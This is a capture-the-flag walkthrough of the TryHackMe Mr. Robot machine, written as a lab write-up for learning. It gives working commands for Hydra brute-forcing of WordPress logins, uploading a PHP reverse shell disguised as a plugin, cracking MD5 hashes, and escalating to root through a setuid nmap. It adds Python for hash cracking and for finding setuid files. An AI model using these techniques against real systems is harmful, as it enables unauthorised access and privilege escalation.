In this blog post, I'll walk you through my experience tackling the Mr. Robot CTF virtual machine, available on TryHackMe. The primary objective is to uncover three hidden flags by exploiting vulnerabilities in the system.
The challenge centers on a WordPress installation with weak credentials and an old setuid binary that should never have been setuid. Two weaknesses carry the whole chain:
Weak Credentials: A common username and a password that appears in a wordlist left on the server itself make the login susceptible to brute-force attacks.
Outdated Software with SUID: Old Nmap builds (versions 2.02 through 5.21) still have an interactive mode that can spawn a shell; installed with the SUID bit set, such a binary hands a root shell to any local user.
I began by adding the VM's IP address to my /etc/hosts file for easier reference, assigning it the domain mrrobot.thm.
Next, I performed an Nmap scan to identify open ports and services:
nmap -sC -sV -oA mrrobot mrrobot.thm
The scan revealed:
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd (SSL-only mode)
With HTTP and HTTPS services running, I decided to explore the web server. While doing so, I initiated a Gobuster scan to discover hidden directories:
gobuster dir -u http://mrrobot.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt
The Gobuster results indicated a WordPress installation with several accessible directories, including /robots.txt, which pointed to key-1-of-3.txt (the first flag) and to a fsocity.dic file, a large wordlist clearly intended for brute-forcing. The wordlist is mostly duplicate entries, so deduplicating it with sort -u before feeding it to Hydra cuts the run time to a fraction.
Navigating to /wp-login.php, I attempted a dummy login and observed that WordPress returned a distinct "Invalid username" error when the account did not exist, which makes username enumeration possible. Using Burp Suite, I captured the POST parameters of the login form and then used Hydra to brute-force the username alone, with a fixed dummy password, matching on that failure string:
hydra -L fsocity.dic -p test mrrobot.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http://mrrobot.thm/wp-admin/&testcookie=1:F=Invalid username"
This revealed the username Elliot. Since a successful login redirects to /wp-admin/ with an HTTP 302, I then brute-forced the password with the same wordlist, this time using the 302 as the success condition:
hydra -l Elliot -P fsocity.dic mrrobot.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http://mrrobot.thm/wp-admin/&testcookie=1:S=302"
The password ER28-0652 was discovered. Elliot is an administrator, so after logging in I could upload new plugins from the dashboard. WordPress treats any PHP file as a plugin as long as a comment block with a Plugin Name: header appears in its first 8 KB, so I prepended such a header to a PHP reverse shell script, zipped it, and uploaded it as a new plugin.
Before activating the plugin, I set up a Netcat listener on my local machine:
nc -lvp 4444
Upon activating the plugin, WordPress included the file and I received a reverse shell as the daemon user, the account Apache runs under. Because su later on refuses to run without a terminal, I upgraded the shell to a pseudo-terminal with Python:
python -c 'import pty; pty.spawn("/bin/bash")'
Exploring /home/robot, I found key-2-of-3.txt (readable only by robot, so not yet accessible to daemon) and password.raw-md5, which, as the name says, holds an unsalted MD5 hash of the robot user's password. I cracked it with Hashcat in raw MD5 mode (-m 0) against rockyou; if the file stores the hash as user:hash rather than the bare digest, add --username so Hashcat ignores the prefix:
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
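To make clear what Hashcat is doing with -m 0 here, and why deduplicating the wordlist costs nothing (the same point applies to fsocity.dic before the Hydra runs above), here is a small Python cracker I added for this write-up; it is not the author's code and not a replacement for Hashcat. The hash line and the wordlist are constructed for the example, and the password it recovers is made up, not the one on the box.

```python
"""Crack an unsalted (raw) MD5 hash against a wordlist.

Added example of the work hashcat -m 0 does; not the author's code.
SAMPLE_LINE and SAMPLE_WORDLIST are constructed inputs for the example.
"""
import hashlib

# Constructed stand-in for password.raw-md5 in user:hash form. "Raw MD5"
# means the digest is simply md5(password) with no salt, so one md5 call
# per candidate is all a cracker needs.
SAMPLE_LINE = "robot:" + hashlib.md5(b"wonderland1").hexdigest()

# Constructed wordlist with the kind of repetition fsocity.dic shows.
SAMPLE_WORDLIST = ["password", "123456", "password", "elliot",
                   "wonderland1", "elliot", "wonderland1"]


def parse_hash_line(line):
    """Accept either a bare hex digest or user:digest (hashcat's --username form).

    Returns (user_or_None, lowercase_digest).
    """
    line = line.strip()
    user, sep, digest = line.rpartition(":")
    if not sep:
        return None, line.lower()
    return user, digest.lower()


def unique_in_order(words):
    """Yield each candidate once, keeping first-seen order.

    Same effect as sort -u on the wordlist, minus the reordering.
    """
    seen = set()
    for w in words:
        w = w.rstrip("\r\n")
        if w not in seen:
            seen.add(w)
            yield w


def crack_raw_md5(digest, wordlist):
    """Return (password, attempts) on success or (None, attempts) if exhausted."""
    attempts = 0
    for candidate in unique_in_order(wordlist):
        attempts += 1
        if hashlib.md5(candidate.encode()).hexdigest() == digest:
            return candidate, attempts
    return None, attempts


if __name__ == "__main__":
    user, digest = parse_hash_line(SAMPLE_LINE)
    pw, n = crack_raw_md5(digest, SAMPLE_WORDLIST)
    print("%s: %s after %d unique candidates" % (user, pw, n))
```

Against a real wordlist, pass the file object itself as the wordlist; the generator strips the newlines and skips repeats as it goes.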
The cracked password allowed me to switch to the robot user, which can read key-2-of-3.txt:
su - robot
To escalate privileges to root, I uploaded and ran LinEnum, which highlighted that /usr/local/bin/nmap had the SUID bit set and was owned by root (a manual search for setuid files turns up the same thing). Nmap versions 2.02 through 5.21 ship an interactive mode in which a ! prefix runs shell commands, and because the binary is setuid root the spawned shell keeps an effective UID of 0:
nmap --interactive
!sh
This provided a root shell, allowing me to read the final flag in /root/key-3-of-3.txt. Note that !sh rather than !bash matters here: bash drops an effective UID that differs from the real UID unless it is started with -p, whereas sh keeps it.
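Added example (my code, not LinEnum's): the same setuid search in Python, with a hand-picked list of binaries that GTFOBins documents as shell spawners when setuid root. build_demo_tree() constructs a throwaway directory with a fake setuid nmap so the scan can be tried without root; run find_suid("/") for the real thing. Appearing in the list is a lead, not a confirmed escalation: with nmap the version still has to be 5.21 or older for --interactive to exist.

```python
"""Find setuid files and flag the ones known to yield a shell.

Added example reproducing the check that found /usr/local/bin/nmap; not
LinEnum's code. KNOWN_SHELL_SPAWNERS is a short hand-picked subset of the
GTFOBins SUID list, not an exhaustive catalogue.
"""
import os
import stat
import tempfile

KNOWN_SHELL_SPAWNERS = {
    "nmap", "find", "vim", "python", "python3", "perl",
    "bash", "env", "less", "more", "awk",
}


def find_suid(root="/"):
    """Return regular files under root with the setuid bit set, sorted.

    Equivalent to: find / -perm -4000 -type f 2>/dev/null
    Directories we cannot read are skipped; symlinks are not followed, so a
    link loop cannot make the walk run forever.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def flag_interesting(paths):
    """Return the subset whose basename is a known shell spawner.

    Matching is on the exact basename, so a versioned name such as
    nmap-3.81 would not be flagged; review the full list by hand too.
    """
    return [p for p in paths if os.path.basename(p) in KNOWN_SHELL_SPAWNERS]


def build_demo_tree():
    """Constructed sample tree: a fake setuid 'nmap' next to a plain file.

    Setting the setuid bit on a file you own needs no privileges, which is
    why this works as an unprivileged user. Returns (root, path_to_nmap).
    """
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bindir = os.path.join(root, "usr", "local", "bin")
    os.makedirs(bindir)
    target = os.path.join(bindir, "nmap")
    plain = os.path.join(bindir, "ls")
    for p in (target, plain):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(target, 0o4755)  # rwsr-xr-x: the 's' is the setuid bit
    os.chmod(plain, 0o755)
    return root, target


if __name__ == "__main__":
    # Real run: the setuid bit only buys root if root owns the file.
    for p in find_suid("/"):
        owner = os.stat(p).st_uid
        tag = "  <-- known shell spawner" if flag_interesting([p]) else ""
        print("%s (owner uid %d)%s" % (p, owner, tag))
```

On the box the interesting entry is the root-owned /usr/local/bin/nmap; the owner check in the main loop is what separates that from a setuid file some unprivileged user happens to own.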